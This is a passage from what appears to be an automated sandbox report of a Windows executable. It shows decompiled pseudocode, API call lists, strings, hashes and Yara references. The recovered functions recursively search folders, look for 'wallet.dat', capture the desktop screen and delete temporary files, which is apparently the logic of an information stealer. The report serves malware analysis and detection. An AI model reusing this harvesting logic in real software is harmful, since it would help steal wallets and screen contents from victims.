						}
					}
					if(_v568 != 0x2e && E0040A70E( &_v568, _a8) != 0 && E0040A70E( &_v568, _a12) == 0) {
						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &(_v616.dwReserved1));
						E0040B177(_v684, _t183, _t192, _a8, _a12, _a16, _a20);
						_t198 = _t198 + 0x14;
						LocalFree(_t192);
						_t190 = _v684;
					}
					L19:
					_push( &(_v616.ftCreationTime));
					_push(_t130);
				} while ( *((intOrPtr*)( *0x40e148))() != 0);
				LocalFree(_v640);
				FindClose(_t130);
				goto L21;
			}

0x0040b17d
0x0040b190
0x0040b192
0x0040b196
0x0040b19a
0x0040b19e
0x0040b1b2
0x0040b1bb
0x0040b1bf
0x0040b1d0
0x0040b1d2
0x0040b1d9
0x0040b4e6
0x0040b4ee
0x0040b4ee
0x0040b1df
0x0040b1e1
0x0040b1e6
0x0040b27a
0x00000000
0x0040b294
0x0040b2a1
0x0040b2ba
0x0040b2bf
0x0040b2c9
0x0040b2cd
0x0040b2d2
0x0040b2d8
0x0040b4a3
0x0040b4a4
0x0040b4ab
0x0040b4b2
0x0040b4b8
0x0040b4b8
0x0040b4bc
0x00000000
0x0040b4bc
0x0040b2e3
0x0040b2e5
0x0040b2e6
0x0040b2eb
0x00000000
0x00000000
0x0040b305
0x0040b30a
0x0040b30e
0x0040b321
0x0040b330
0x0040b332
0x0040b33a
0x0040b33f
0x0040b350
0x0040b364
0x0040b372
0x0040b37f
0x0040b396
0x0040b39a
0x0040b3ab
0x0040b3ba
0x0040b3be
0x0040b3c0
0x0040b3c4
0x0040b3ca
0x0040b482
0x0040b483
0x0040b48a
0x0040b494
0x0040b49b
0x0040b428
0x0040b428
0x00000000
0x0040b428
0x0040b3e6
0x0040b3ea
0x0040b43d
0x0040b44a
0x0040b453
0x0040b457
0x0040b459
0x0040b460
0x0040b465
0x0040b474
0x0040b476
0x0040b477
0x0040b478
0x0040b479
0x0040b47a
0x0040b47e
0x00000000
0x0040b47e
0x0040b3ed
0x0040b3f8
0x0040b402
0x0040b409
0x0040b410
0x0040b41b
0x0040b422
0x00000000
0x0040b422
0x0040b27a
0x0040b1f2
0x0040b22c
0x0040b246
0x0040b254
0x0040b259
0x0040b25d
0x0040b263
0x0040b263
0x0040b4c0
0x0040b4c9
0x0040b4ca
0x0040b4cd
0x0040b4d9
0x0040b4e0
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
LocalFree.KERNEL32(00000000), ref: 0040B3ED
LocalFree.KERNEL32(?), ref: 0040B3F8
LocalFree.KERNEL32(?), ref: 0040B402
LocalFree.KERNEL32(?), ref: 0040B409
LocalFree.KERNEL32(00000000), ref: 0040B410
CloseHandle.KERNEL32(?), ref: 0040B41B
DeleteFileW.KERNEL32(?), ref: 0040B422
LocalFree.KERNEL32(?), ref: 0040B483
LocalFree.KERNEL32(00000000), ref: 0040B48A
LocalFree.KERNEL32(?), ref: 0040B494
LocalFree.KERNEL32(00000000), ref: 0040B49B
LocalFree.KERNEL32(?), ref: 0040B4A4
LocalFree.KERNEL32(00000000), ref: 0040B4AB
DeleteFileW.KERNEL32(?), ref: 0040B4B2
LocalFree.KERNEL32(?), ref: 0040B4D9
FindClose.KERNEL32(00000000), ref: 0040B4E0

Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D

Strings

., xrefs: 0040B1EC
x`, xrefs: 0040B332
X_, xrefs: 0040B33F

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$File$CloseDeleteFind$AllocFirstHandleSize
String ID: .$x`$X_
API String ID: 322622607-3117628237
Opcode ID: 04364d73bcef1689b049200a64eac8d0f8770373568ae75747d9922d16b9fc35
Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
Opcode Fuzzy Hash: 04364d73bcef1689b049200a64eac8d0f8770373568ae75747d9922d16b9fc35
Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE06 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 300
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
FindFirstFileW.KERNEL32(00000000,?), ref: 0040AE9C
LocalFree.KERNEL32(00000000), ref: 0040AEA9
LocalFree.KERNEL32(00000000), ref: 0040AEB0

Strings

wallet.dat, xrefs: 0040AF43
x`, xrefs: 0040AFF0

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$FileFindFirstFolderPathSpecial
String ID: wallet.dat$x`
API String ID: 2611946579-2762988524
Opcode ID: d47390dd24567c3e8fb379bc85c7d25821fc5b260f3edf2a270333147ef749dd
Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
Opcode Fuzzy Hash: d47390dd24567c3e8fb379bc85c7d25821fc5b260f3edf2a270333147ef749dd
Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADD Relevance: 30.4, APIs: 20, Instructions: 387filewindowlibraryCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00408B01
LoadLibraryW.KERNEL32 ref: 00408B16
GetClientRect.USER32(?,?), ref: 00408C7F
SetStretchBltMode.GDI32(?,00000004), ref: 00408C88
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00CC0020), ref: 00408CC5
SelectObject.GDI32(?,00000000), ref: 00408CFA
GetObjectW.GDI32(00000000,00000018,?), ref: 00408D37

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 00408D9E

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00408E46
CloseHandle.KERNEL32(?), ref: 00408E51
DeleteFileW.KERNEL32(?), ref: 00408E58
LocalFree.KERNEL32(?), ref: 00408E5F
LocalFree.KERNEL32(?), ref: 00408E69
LocalFree.KERNEL32(00000000), ref: 00408F41
LocalFree.KERNEL32(?), ref: 00408F4B
LocalFree.KERNEL32(?), ref: 00408F55
LocalFree.KERNEL32(?), ref: 00408F5C
LocalFree.KERNEL32(?), ref: 00408F66
DeleteObject.GDI32(00000000), ref: 00408F6D
DeleteObject.GDI32(?), ref: 00408F77

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Object$Delete$FileStretchlstrlen$AllocClientCloseCreateDesktopGlobalHandleLibraryLoadModeRectSelectWindow
String ID:
API String ID: 2597395389-0
Opcode ID: 838e31161bc8a2d1816a3f00eced3677b9020de43e414126656e140eaa75b6aa
Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
Opcode Fuzzy Hash: 838e31161bc8a2d1816a3f00eced3677b9020de43e414126656e140eaa75b6aa
Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8F Relevance: 27.3, APIs: 18, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				struct _WIN32_FIND_DATAW _v640;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t77;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				WCHAR* _t97;
				void* _t98;
				int _t101;
				signed int _t103;
				void* _t105;
				void* _t107;
				void* _t109;
				void* _t111;
				signed int _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				signed int _t160;
				intOrPtr _t173;
				void* _t181;
				void* _t186;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v36 = __edx;
				_v28 = __ecx;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
				while(1) {
					_t124 = _t60;
					if(_t124 == 0) {
						break;
					}
					_t125 = _t124 + 8;
					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
					_t3 = _t62 + 2; // 0x2
					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v24 = _t63;
					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64);
					_v12 = _t66;
					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68); // executed
					_v16 = _t70;
					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
					_v20 = _t186;
					_v32 = _v24 - _t125 >> 1;
					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
					__eflags = _t77;
					if(_t77 == 0) {
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_t186);
						L16:
						L17:
						return 1;
					}
					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
					_t189 = _t181 - _t125 >> 1;
					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
					__eflags = _t86;
					if(_t86 == 0) {
						L14:
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L16;
					}
					_t17 = _t181 + 2; // 0x2
					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
					_t20 = _t189 + 1; // 0x1
					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
					__eflags = _t91;
					if(_t91 == 0) {
						goto L14;
					}
					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
					_v24 = _t94;
					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
					_t173 =  *0x40e1d0; // 0x5f57c0
					_t97 = E0040A503(_t96, _t173);
					_v44 = _t97;
					_t98 = FindFirstFileW(_t97,  &_v640); // executed
					_t127 = _t98;
					_v40 = _t127;
					__eflags = _t127 - 0xffffffff;
					if(_t127 == 0xffffffff) {
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						__eflags = _v640.dwFileAttributes & 0x00000010;
						if((_v640.dwFileAttributes & 0x00000010) != 0) {
							__eflags = _v640.cFileName - 0x2e;
							if(_v640.cFileName != 0x2e) {
								_t103 =  *((intOrPtr*)( *0x40e18c))( &(_v640.cFileName), _v12);
								__eflags = _t103;
								if(_t103 != 0) {
									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
									_v32 = _t191;
									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t35 = _t107 + 2; // 0x2
									_t160 = _t35 - _t191;
									__eflags = _t160;
									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t39 = _t109 + 2; // 0x2
									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_t192 = _v24;
									_t111 = E0040A503(0, _t192);
									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &(_v640.cFileName));
									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
									_t194 = _t194 + 0x10;
									LocalFree(_t193);
									LocalFree(_v32);
									_t127 = _v40;
								}
							}
						}
						_t101 = FindNextFileW(_t127,  &_v640); // executed
						__eflags = _t101;
					} while (_t101 != 0);
					FindClose(_t127); // executed
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v44);
					_t123 = _v48 + 2;
					__eflags = _t123;
					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
				}
				goto L17;
			}

0x00403ca6
0x00403caa
0x00403cad
0x00403f55
0x00403f55
0x00403f59
0x00000000
0x00000000
0x00403cbf
0x00403cc3
0x00403cd1
0x00403cd5
0x00403ce6
0x00403cf0
0x00403cfb
0x00403d0a
0x00403d1b
0x00403d27
0x00403d3b
0x00403d3e
0x00403d41
0x00403d48
0x00403d4a
0x00403f7f
0x00403f88
0x00403f8f
0x00403f8f
0x00403f95
0x00000000
0x00403f97
0x00403d6b
0x00403d71
0x00403d78
0x00403d7f
0x00403d81
0x00403f65
0x00403f68
0x00403f71
0x00403f8f
0x00000000
0x00403f8f
0x00403d93
0x00403d9b
0x00403da6
0x00403dac
0x00403db3
0x00403db5
0x00000000
0x00000000
0x00403dc8
0x00403dd7
0x00403de4
0x00403ded
0x00403df2
0x00403dfa
0x00403e0d
0x00403e10
0x00403e12
0x00403e14
0x00403e17
0x00403e1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403e20
0x00403e20
0x00403e20
0x00403e27
0x00403e2d
0x00403e35
0x00403e4a
0x00403e4c
0x00403e4e
0x00403e60
0x00403e74
0x00403e7b
0x00403e7e
0x00403e82
0x00403e89
0x00403e89
0x00403e8f
0x00403e9a
0x00403ea9
0x00403eac
0x00403eae
0x00403eb5
0x00403ed1
0x00403eda
0x00403edf
0x00403ee3
0x00403eec
0x00403ef2
0x00403ef2
0x00403e4e
0x00403e35
0x00403f02
0x00403f04
0x00403f04
0x00403f0d
0x00403f16
0x00403f1f
0x00403f28
0x00403f31
0x00403f3a
0x00403f4f
0x00403f4f
0x00403f53
0x00403f53
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 7033ab7947e03b629340bb67c13699516427485895a10c81e5c8031ef29e1b91
Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
Opcode Fuzzy Hash: 7033ab7947e03b629340bb67c13699516427485895a10c81e5c8031ef29e1b91
Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004052DA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v568;
				struct _WIN32_FIND_DATAW _v616;
				intOrPtr _v628;
				void* _v632;
				void* _v640;
				intOrPtr _v664;
				char _v668;
				intOrPtr _v688;
				void* _v696;
				intOrPtr _v700;
				void* _v704;
				void* _v712;
				void* _v716;
				void* _v720;
				char _v736;
				intOrPtr _v748;
				intOrPtr _v760;
				void* _v768;
				intOrPtr _v776;
				signed int _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				intOrPtr _v800;
				void* _v804;
				void* _v820;
				void* _v828;
				void* __ebx;
				void* __esi;
				void* _t62;
				void* _t66;
				void* _t68;
				char _t69;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t74;
				void* _t76;
				void* _t86;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t164;
				signed int _t166;
				void* _t168;

				_t168 = (_t166 & 0xfffffff8) - 0x284;
				_v628 = __edx;
				_t160 = __ecx;
				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
				_v632 = _t113;
				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
				_t66 = FindFirstFileW(_t113,  &_v616); // executed
				_t154 = _t66;
				_v640 = _t154;
				if(_t154 != 0xffffffff) {
					_t114 = _t160;
					do {
						if((_v616.ftCreationTime & 0x00000010) == 0) {
							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &(_v616.dwReserved1));
							_v668 = _t69;
							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
							_v700 = _t72;
							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v700 = _t73;
							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
							_t161 = _v696;
							if(E0040A2AA(_t161 + _t74 * 2,  &_v704, _v688) != 0) {
								_t76 = E0040A503(_v712, _v704);
								_v712 = _t76;
								_v716 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								if(E0040A69E( *0x40e044,  &_v716) != 0) {
									_t164 = _v716;
									_push(0);
									_push(_t164);
									_push(_v704);
									if( *((intOrPtr*)( *0x40e184))() != 0) {
										_v748 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v760, 0xffffffff, 0, 0, 0, 0);
										_v768 = 0;
										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
										_t151 = _v776;
										_v796 = 0;
										if(_t151 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v800, 0xffffffff, 0, _t151, 0, 0);
											if(0 == 0 || E0040A70E( &_v736, _a8) == 0) {
												LocalFree(_v828);
												CloseHandle(_v820);
												DeleteFileW(_t164);
												LocalFree(_t164);
											} else {
												_t139 = _a20;
												_v784 = _v784 & 0x00000000;
												_v796 = _v828;
												_v792 = _v820;
												_v788 = _t164;
												 *_t139 =  *_a20 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t154 = _v804;
											}
										}
									}
								}
								LocalFree(_v704);
							} else {
								LocalFree(_t161);
							}
							LocalFree(_v720);
							LocalFree(_v712);
							L18:
							goto L19;
						}
						if(_v568 != 0x2e && E0040A70E( &_v568, _a12) == 0) {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &(_v616.dwReserved1));
							E004052DA(_t163, _v664, _a4, _a8, _a12, _a16, _a20);
							_t168 = _t168 + 0x14;
							LocalFree(_t163);
							goto L18;
						}
						L19:
						_push( &_v668);
						_push(_t154);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					LocalFree(_v696);
					FindClose(_t154);
					goto L21;
				} else {
					LocalFree(_t113);
					L21:
					return 0;
				}
			}

0x004052e0
0x004052f5
0x004052f9
0x004052fb
0x0040530d
0x00405316
0x0040531a
0x0040532b
0x0040532d
0x0040532f
0x00405336
0x00405344
0x00405346
0x0040534b
0x004053bb
0x004053ca
0x004053d9
0x004053dd
0x004053f3
0x00405405
0x00405409
0x00405417
0x0040541b
0x0040541d
0x00405430
0x00405440
0x00405452
0x0040545c
0x00405467
0x0040546d
0x00405476
0x00405478
0x00405479
0x00405481
0x004054a3
0x004054b9
0x004054c8
0x004054cc
0x004054ce
0x004054d2
0x004054d8
0x004054f7
0x004054fb
0x00405549
0x00405554
0x0040555b
0x00405562
0x0040550d
0x0040550d
0x00405514
0x00405519
0x00405521
0x00405530
0x00405538
0x0040553a
0x0040553b
0x0040553c
0x0040553d
0x0040553e
0x0040553e
0x004054fb
0x004054d8
0x00405481
0x0040556c
0x00405432
0x0040556c
0x0040556c
0x00405576
0x00405580
0x00405580
0x00000000
0x00405580
0x00405353
0x00405379
0x00405391
0x004053a1
0x004053a6
0x00405580
0x00000000
0x00405580
0x00405586
0x0040558f
0x00405590
0x00405593
0x004055a0
0x004055a7
0x00000000
0x00405338
0x00405339
0x004055ad
0x004055b5
0x004055b5

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040532B
LocalFree.KERNEL32(00000000), ref: 00405339
LocalFree.KERNEL32(?), ref: 00405580
LocalFree.KERNEL32(?), ref: 004055A0
FindClose.KERNEL32(00000000), ref: 004055A7

Strings

., xrefs: 0040534D

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Find$CloseFileFirst
String ID: .
API String ID: 422121646-248832578
Opcode ID: bd20fc7f58a842cfc8191288ec23c6b18ca6e14ed617f1f94f3c277aa8c6bcd4
Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
Opcode Fuzzy Hash: bd20fc7f58a842cfc8191288ec23c6b18ca6e14ed617f1f94f3c277aa8c6bcd4
Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401B05 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00401B05(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				intOrPtr _v12;
				struct _WIN32_FIND_DATAW _v608;
				char _v1126;
				short _v1128;
				void* __ebx;
				void* __esi;
				void* _t32;
				int _t33;
				void* _t39;
				signed int _t41;
				void* _t60;
				WCHAR* _t80;
				void* _t81;
				WCHAR* _t83;
				void* _t84;

				_v12 = __edx;
				_t80 = __ecx;
				if(_a12 > 2) {
					L14:
					return 1;
				}
				_push(__ecx);
				E004018E9( &_v1128, 0x104, __ecx, __ecx);
				E0040188C(0x104,  &_v1128, 0x104, _t81,  *0x40e1d0);
				_t32 = FindFirstFileW( &_v1128,  &_v608); // executed
				_t60 = _t32;
				if(_t60 != 0xffffffff) {
					goto L3;
				} else {
					return 0;
				}
				do {
					L3:
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					_push( *0x40e1dc);
					_push( &(_v608.cFileName));
					if( *((intOrPtr*)( *0x40e0a0))() != 0) {
						_push( *0x40e1ac);
						_push( &(_v608.cFileName));
						if(lstrlenW( *((intOrPtr*)( *0x40e18c))()) <= 0) {
							_t39 = 0x2e;
							if(_t39 != _v608.cFileName) {
								_t41 =  *((intOrPtr*)( *0x40e08c))(_t80);
								_t70 =  &_v1126 + _t41 * 2;
								_push( &_v1126 + _t41 * 2);
								E004018E9( &_v1126 + _t41 * 2, 0x104, _t70,  &(_v608.cFileName));
								_t25 =  &_a8; // 0x407b38
								E00401B05( &_v1128, _v12, _a4,  *_t25, _a12 + 1); // executed
								_t84 = _t84 + 0xc;
							}
							goto L12;
						}
						_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
						PathCombineW(_t83, _t80,  &(_v608.cFileName));
						_push(1);
						L8:
						_t14 =  &_a8; // 0x407b38
						_push( *_t14);
						_push(_a4);
						E00401E18(_t83, _v12); // executed
						_t84 = _t84 + 0xc;
						if(_t83 != 0) {
							LocalFree(_t83);
						}
						goto L12;
					}
					_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					PathCombineW(_t83, _t80,  &(_v608.cFileName));
					_push(0);
					goto L8;
					L12:
					_t33 = FindNextFileW(_t60,  &_v608); // executed
				} while (_t33 != 0);
				FindClose(_t60); // executed
				goto L14;
			}

0x00401b15
0x00401b18
0x00401b1a
0x00401c80
0x00000000
0x00401c80
0x00401b20
0x00401b30
0x00401b43
0x00401b5b
0x00401b5d
0x00401b62
0x00000000
0x00401b64
0x00000000
0x00401b64
0x00401b6b
0x00401b6b
0x00401b72
0x00000000
0x00000000
0x00401b78
0x00401b89
0x00401b8e
0x00401bb3
0x00401bca
0x00401bd2
0x00401c17
0x00401c1f
0x00401c27
0x00401c34
0x00401c37
0x00401c40
0x00401c53
0x00401c59
0x00401c5e
0x00401c5e
0x00000000
0x00401c1f
0x00401be2
0x00401bed
0x00401bf3
0x00401bf5
0x00401bf5
0x00401bf5
0x00401bfd
0x00401c00
0x00401c05
0x00401c0a
0x00401c0d
0x00401c0d
0x00000000
0x00401c0a
0x00401b9e
0x00401ba9
0x00401baf
0x00000000
0x00401c61
0x00401c6f
0x00401c71
0x00401c7a
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
LocalFree.KERNEL32(00000000), ref: 00401C0D
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401C6F
FindClose.KERNEL32(00000000), ref: 00401C7A

Strings

8{@, xrefs: 00401C53, 00401BF5

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$File$CloseCombineFirstFreeLocalNextPath
String ID: 8{@
API String ID: 3818457336-1865321623
Opcode ID: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
Opcode Fuzzy Hash: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004092CF Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

wsprintfW.USER32 ref: 004093E3

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
